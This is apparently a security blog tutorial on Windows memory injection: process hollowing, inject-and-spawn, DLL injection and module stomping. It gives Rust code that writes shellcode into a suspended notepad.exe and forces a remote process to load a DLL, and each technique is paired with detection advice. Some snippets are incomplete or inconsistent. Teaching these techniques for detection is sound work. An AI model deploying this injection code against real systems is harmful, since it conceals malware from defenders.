Introduction to Memory Injection

2024-03-06 · 9min

Table of Contents

As security software gets smarter and more effective, finding ways to hide from it have also evolved. There are a number of methods and tactics employed to achieve full memory residence, thus thwarting many detection mechanisms. Understanding these implementations is essential to developing solutions to the problem.

The threat of memory resident, or "file-less", malware is not at all new. For years actors have used these technologies to evade detection and enhance the effectiveness of ransomware, banking malware, and even toolkits such as Metasploit and Cobalt Strike.

But how do these things work? Well, in truth, there really is nothing particularly complicated once one can understand the operating system features and capabilities leveraged to employ thees attacks.

The Basics

To begin, let's look at application code as it is being run. Simplistically we can think of a program a little like this:

|---code---|---heap memory---|
  ^- execution pointer

Now there is a lot we leave out here in this little diagram, namely things like the stack and where certain data is located. There are tables in most executable formats that include symbols, debug information, import and export sections, etc. For now, we don't really need to look at these.

The magic of memory injection is changing the location of the execution pointer to some custom location housing the code we want to run. This interrupts the actual flow of the application and allows the "attacker" to hijack the rest of the program's lifetime.

Now we'll take a look at some simple breakdowns of various techniques to get code loaded into an application and alter it's execution.

Payload

Throughout the rest of this post, I will reference a "payload" to inject. There are a number of ways to go about creating one, but a simple and effective method would be to use metasploit to produce some message box shellcode (or whatever else you prefer).

Process Hollowing

To support features like debugging, operating systems enable breakpoints to halt execution and inspect the state of the running process. Another fun feature involves the "state" of an application when it is spawned. In general, when you run a program, it just executed as a normally running process. There are other states, however, including the SUSPENDED state. This enables the application loader to bring the process code into memory, resolve imports, and align all the sections to their proper locations for the application to run. But this is where it stops. The program is ready to go and the execution pointer is targeting the first instruction location, but it does not proceed with the actual execution.

This is where we can get clever. By starting the process in a suspended state and knowing where the code section is located, we can now overwrite the normal functionality of the application with our custom code. This has the fun side effect of the application appearing as though it is the legitimate original.

Example

Now let us take a peek at what this can look like in actual code. First we need to start by creating a process in a suspended state. I am going to use windows examples, even though this same technique can be applied to Linux and MacOS (the latter requires code signed binaries to access some of the necessary APIs, however).

Luckily for us, MSDN has some fairly helpful documentation on process creations flags. Most importantly for our purposes:

CREATE_SUSPENDED 0x00000004 The primary thread of the new process is created in a suspended state, and does not run until the ResumeThread function is called.

Quick Disclaimer: much of this code assumes we are dealing with 64 bit processes, in reality we should account for either 32 or 64 bit applications.

use goblin::pe::header::Header;
use std::{
    ffi::CString,
    mem::{size_of, zeroed},
    ptr::{null_mut, read},
};
use winapi::{
    ctypes::c_void,
    um::{
        errhandlingapi::GetLastError,
        memoryapi::{ReadProcessMemory, WriteProcessMemory},
        processthreadsapi::{CreateProcessA, ResumeThread, PROCESS_INFORMATION, STARTUPINFOA},
        winbase::CREATE_SUSPENDED,
        winnt::HANDLE,
    },
};

#[link(name = "ntdll")]
extern "system" {
    fn NtQueryInformationProcess(
        ProcessHandle: *mut c_void,
        ProcessInformationClass: u32,
        ProcessInformation: *mut c_void,
        ProcessInformationLength: u32,
        ReturnLength: *mut u32,
    ) -> u32;
}

let mut startup_info: STARTUPINFOA = unsafe { zeroed() };
let mut process_info: PROCESS_INFORMATION = unsafe { zeroed() };

let path = CString::from(r"c:\windows\system32\notepad.exe");

if 0 == unsafe {
    CreateProcessA(
        c_path.as_ptr(),
        null_mut(),
        null_mut(),
        null_mut(),
        0,
        CREATE_SUSPENDED,
        null_mut(),
        null_mut(),
        &mut startup_info,
        &mut process_info,
    )
} {
    panic!("Could not create the process to hollow!");
}

At this point, a notepad.exe process is loaded up and ready for some plain text editing. But we have different plans! This is where things start to get fun. To figure out where to inject our shellcode, we really need to find the execution entry point. Luckily for us, the PROCESS_INFORMATION structure contains a handle to the main thread of the loaded process. We can query the information about this thread to retrieve the entry address!

let mut thread_base_address = 0;

NtQueryInformationThread(
    thread,
    9, // See note below!
    &mut thread_base_address as *mut _ as _,
    size_of::<usize>() as _,
    null_mut(),
);

Now the InformationClass parameter for this function call is not officially documented. However, there are several projects that aim to implement these functions and have provided descriptions, such as ntinternals.net

We have everything we need at this point. We assume the payload is our shellcode stored as a Vec<u8> and:

let mut bytes_out = 0;

if WriteProcessMemory(
    process,
    entry_point as _,
    payload.as_ptr() as _,
    payload.len() as _,
    &mut bytes_out,
) == 0
{
    panic!("Could not write process memory: {}", GetLastError());
}

The last thing we need to do is resume our process thread:

ResumeThread(process_info.hThread);

You will now see a message box, if you chose to go that route. If you open windows task manager you will also see an instance of notepad.exe running. Viewing the details of the process will show the application appears completely legitimate and indistinguishable from a "normal" instance of the same process.

Detection

Generally speaking, this isn't a conceptually difficult attack to detect. If we have the original code on disk and that in memory, we can compare them for differences. An issue arises due to a side effect of the loading process. Programs are compiled with addresses to functions and variables at various offsets inside the binary code. A semi-randomization process takes place to adjust these offsets when the program is loaded. This does two things: first it adjusts the offsets to their memory aligned locations since there is often different alignments on disk vs in memory. Secondly, the randomization process (on windows this is referred to as Address Space Layer Randomization, or ASLR) is intended to thwart attacks which rely on knowing addresses of code to call, such as a buffer overflow.

Now knowing this, we can try to resolve these differences in a couple of ways. Finding the first known address and comparing it to the offsets on disk can potentially allow us to compute the ASLR offset. At this point we would need to account for these differences when comparing the disk vs memory code.

Alternatively we could perform a likeness comparison between the code segments and determine some acceptable drift for detecting a hollowing attack.

This is even further complicated by technologies like Windows-on-Windows 64, or WOW64, the subsystem for running 32-bit applications on 64-bit windows. This system actually ends up rewriting and shimming code in 32-bit applications which fundamentally changes them making comparison even more difficult.

Inject and Spawn

This is a very common technique for running code in a remote process. The basic concept is that some executable code is written into allocated heap space in a running process. A new thread is then spawned in that process with the heap address as the starting location.

If you have some ready made shellcode, this process is pretty simple:

OpenProcess()
VirtualAllocEx()
WriteProcessMemory()
CreateRemoteThread()

If you don't have shellcode and want to execute something like a raw executable file, you will need to do some basic memory management to replicate loader functionality. This will assure any import addresses are correctly computed in accordance with ASLR and expected section offset locations.

Detection

A common practice for finding injected executables is to look for the headers in places they should not be, such as heap space. This is how malfind in volatility works. Locating shellcode running in memory can be tricky, but looking at where current thread start locations will give a hint if the code section of a module or heap space was used.

DLL Injection

While this process is often referred to as "DLL Injection", that name is very windows-centric and it should be noted that this technique applies to any shared object format such as .so on linux or .dyld on macos.

This process works by causing a running application to load a dynamic library of your choice and run it. This is similar to an "Inject and Spawn" attack but instead of writing program code we write a string containing the path to the library, and then execute a call to LoadLibrary inside the process using CreateRemoteThread.

This attack is helpful for masking the activity of nefarious code inside a trusted application, but it requires the library to be on disk, thus exposing it to possible detection by security products inspecting data at rest.

type FnLoadLibraryA = unsafe extern "system" fn(_: *mut c_void) -> u32;

let process = OpenProcess(PROCESS_ALL_ACCESS, 0, pid);

let path = CString::new(r"c:\path\to\library.dll");

let c_path = CString::new(path.clone())?;

// this gives us the memory location of the string
// in the remote process
let dll_path = VirtualAllocEx(
    process,
    null_mut(),
    path.len(),
    MEM_COMMIT,
    PAGE_READWRITE
);

// write the library path to the string location
if 0 == WriteProcessMemory(
    process,
    dll_path,
    c_path.as_ptr() as _,
    path.len(),
    null_mut(),
) {
    panic!("Cannot write path to remote process");
}


let kernel32 = CString::new("kernel32")?;
let load_library = CString::new("LoadLibraryA")?;

// get the function address of "LoadLibraryA"
let load_library = GetProcAddress(
    GetModuleHandleA(kernel32.as_ptr()), load_library.as_ptr()
);

let mut bad_thread = 0;

// now we call "LoadLibraryA()" in the target
// process and it will load the dll
let thread = CreateRemoteThread(
    process,
    null_mut(),
    0,
    Some(std::mem::transmute::<
        _,
        unsafe extern "system" fn(*mut c_void) -> u32,
    >(load_library as *mut c_void)),
    dll_path,
    0,
    &mut bad_thread,
);

// simply wait for the call to "LoadLibraryA()" to complete
WaitForSingleObject(thread, 0xFFFFFFFF);

Detection

Detecting library injection can be tricky, because it is valid for a running application to dynamically load a dependency. In general, an application will maintain an import table that will contain the functions to use from a dependency. Comparing the current loaded libraries with those referenced in the import table is one naive method for detecting an injection. However, if an application normally dynamically loads various libraries, these will not be listed in the import table to begin with, so this detection method falls apart.

Module Stomping

This is a fun mashup between library injection and process hollowing. The basic principals have already been covered. Here we are forcing a process to load a benign library, but before we call the entry function, we will overwrite it with our shellcode (or entire library if we wish).

Get a process handle
Allocate a string to the path we want to load in the process
Call LoadLibrary
Overwrite the entry point function
Call the entry point function

Detection

Similar to process hollowing and module injection, finding stomped modules can be a bit of a chore. Determining if the module belongs in the process (via import table) is one first step (but not without its issues as described previously). Enumerating the loaded modules in the process then auditing the code segment with what is on disk is another solution. However, this can face similar relocation problems when 32bit <-> 64bit translations and patching happen.

Conclusion

Memory injection is a very interesting and useful technique for concealing execution of code. While detecting the use of these mechanisms can be tricky, understanding how they work can help in demystifying them. The term "file-less malware" came into vogue several years ago, but process injection has been a tactic in use for much longer than it has been present in the collective conscience of the security industry.

Hopefully these simple demonstrations help someone to understand the basic methodologies for some popular memory injection techniques!